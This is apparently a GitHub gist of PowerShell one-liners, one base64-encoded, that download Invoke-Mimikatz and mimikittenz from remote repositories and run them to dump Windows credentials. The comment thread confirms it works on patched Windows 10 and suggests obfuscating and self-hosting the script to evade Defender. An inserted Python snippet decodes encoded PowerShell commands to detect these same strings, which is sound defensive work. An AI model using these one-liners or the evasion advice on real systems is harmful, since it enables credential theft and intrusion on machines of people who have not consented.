Last active May 14, 2024 14:31
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
#ps remoting [remote]
Invoke-Command -ComputerName <IP-Address> -ScriptBlock {powershell etc...}
#impacket's [remote] <USER:PASSWORD@IP-Address> "powershell -enc powershell etc..."
#mimikittenz [local]
IEX (New-Object Net.WebClient).DownloadString(''); Invoke-mimikittenz
#encoded-mimikittenz [local]
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==
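The one-liners above all hide the real command behind `powershell -enc`, which is also what a defender has to undo to see them in process-creation telemetry. As an added example (not part of this gist, not tied to any real telemetry), the Python below decodes an `-EncodedCommand` payload from a command line and reports which of the strings used in this gist it contains; the sample command lines, the `example.invalid` URL and the indicator list are constructed assumptions.

```python
import base64
import re

# Constructed sample process-creation command lines (not real telemetry); the
# first mirrors the "powershell -enc ..." pattern used in this gist.
SAMPLE_CMDLINES = [
    "powershell -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1'); "
        "Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds".encode("utf-16le")
    ).decode(),
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -EncodedCommand "
    + base64.b64encode(b"Get-Service | Where-Object Status -eq 'Running'").decode(),
]
# Strings worth an alert in a decoded command; the first four come from this gist's one-liners.
INDICATORS = ("invoke-mimikatz", "invoke-mimikittenz", "privilege::debug", "-dumpcreds",
              "downloadstring", "iex ")
# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
FLAG_RE = re.compile(r"(?<!\S)-(e[a-z]*)\s+(\S+)", re.IGNORECASE)

def is_encoded_flag(flag):
    return flag.lower() == "ec" or "encodedcommand".startswith(flag.lower())

def _plausible_text(s):
    # Assumption: real command text is ASCII; the wrong charset yields CJK or control chars.
    return s.isascii() and all(c.isprintable() or c in "\r\n\t" for c in s)

def decode_encoded_command(blob):
    # PowerShell expects UTF-16LE, but blobs seen in the wild are sometimes plain UTF-8.
    try:
        raw = base64.b64decode(blob.strip("\"';"), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not base64 at all
        return None
    for charset in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(charset)
        except UnicodeDecodeError:
            continue
        if _plausible_text(text):
            return text
    return None

def triage(cmdline):
    """Return (decoded_text, [matched indicators]) or None if nothing decodable."""
    for m in FLAG_RE.finditer(cmdline):
        if is_encoded_flag(m.group(1)):
            decoded = decode_encoded_command(m.group(2))
            if decoded is not None:
                return decoded, [i for i in INDICATORS if i in decoded.lower()]
    return None
```

Feed it the command-line field of Sysmon event 1 or Windows event 4688 records; a non-empty indicator list on a decoded payload is the alert condition.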
gfoss commented Jul 15, 2019

Thanks, @tuv7041, I just tested and verified - great fix! I've updated the gist to reflect this change.

Seems like this no longer works on Windows 10.

gfoss commented Jan 3, 2020

Thanks for the heads-up @clintonm9 - I've updated the gist with the newer version of Invoke-Mimikatz, available in Empire 3.0:

I've also modified the command slightly, to include 'Invoke-Mimikatz -Command privilege::debug;'. I've tested this successfully on the latest version of Windows 10, fully patched, etc. However this vulnerability could be locked down via organizational policy.

Thanks for updating. I tried again and still got error messages for "This script contains malicious content and has been blocked by your antivirus software." Both "#mimikatz [local]" and "#encoded-mimikatz [local]". It might be on my end or a misunderstanding of how the environment needs to be set up.

gfoss commented Jan 3, 2020

Yeah - if you have Windows Defender enabled, this will not work, unfortunately. They flag on mimikatz in all the many ways you can utilize the tool... One method that still works is obfuscating the Invoke-Mimikatz.ps1 script and hosting this on your own server. That is outside of the scope of this gist though, this is mainly to show how mimikatz works via quick proof of concept.

rexbutz commented Jan 11, 2022

These seem to no longer be working now.

gfoss commented Jan 12, 2022

Thanks for the heads-up @rexbutz! I've updated this to point to the correct Empire repository and have verified that the attack now works as intended. That said, it will only be successful if Microsoft's real-time protection is disabled, other antivirus software is in use, or you get creative.